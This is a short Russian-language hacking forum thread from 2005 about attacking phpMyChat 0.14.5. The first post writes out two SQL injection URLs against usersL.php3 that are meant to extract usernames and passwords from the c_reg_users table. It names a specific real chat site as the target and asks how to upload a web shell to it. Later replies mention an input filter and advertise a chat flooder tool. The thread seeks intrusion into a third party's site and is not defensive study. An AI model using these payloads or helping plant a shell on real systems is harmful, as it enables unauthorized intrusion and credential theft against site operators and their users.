Чаты phpMyChat 0.14.5

Discussion in 'Веб-уязвимости' started by Grema, 30 Dec 2005.

  1. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    Слыхал что это чюдо очень дырявое... пробывал
    http://Target/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
    http://Target/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
    и так не катит... короче какие есть уязвимости? =)
    З.Ы.
    ссылка на чат
    http://fof.od.ua/chat/index.php
    оо... Чють не забыл
    http://fof.od.ua/chat/chat/
    такой глюк еще есть!
    реально ли залить шелл туда?
    если да то как?
     
    #1 Grema, 30 Dec 2005
    Last edited: 30 Dec 2005
  2. k0ldun

    k0ldun New Member

    Joined:
    28 Dec 2005
    Messages:
    20
    Likes Received:
    1
    Reputations:
    1
    ну вот,,, там фильтрация идет : < >,, жду + к репутации/// ещё можешь на секюр-лабе посмотреть
     
    #2 k0ldun, 30 Dec 2005
    Last edited: 30 Dec 2005
  3. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    А залить шелл можно както?
     
  4. AdvLamer

    AdvLamer Elder - Старейшина

    Joined:
    1 Jan 2006
    Messages:
    228
    Likes Received:
    205
    Reputations:
    112
    Флудер

    Цените мой флудер для phpmychat
    http://advlamer.narod.ru >>> Флудер для чата
     
  5. Gisher

    Gisher Elder - Старейшина

    Joined:
    30 Jun 2005
    Messages:
    41
    Likes Received:
    2
    Reputations:
    0
    Молодец)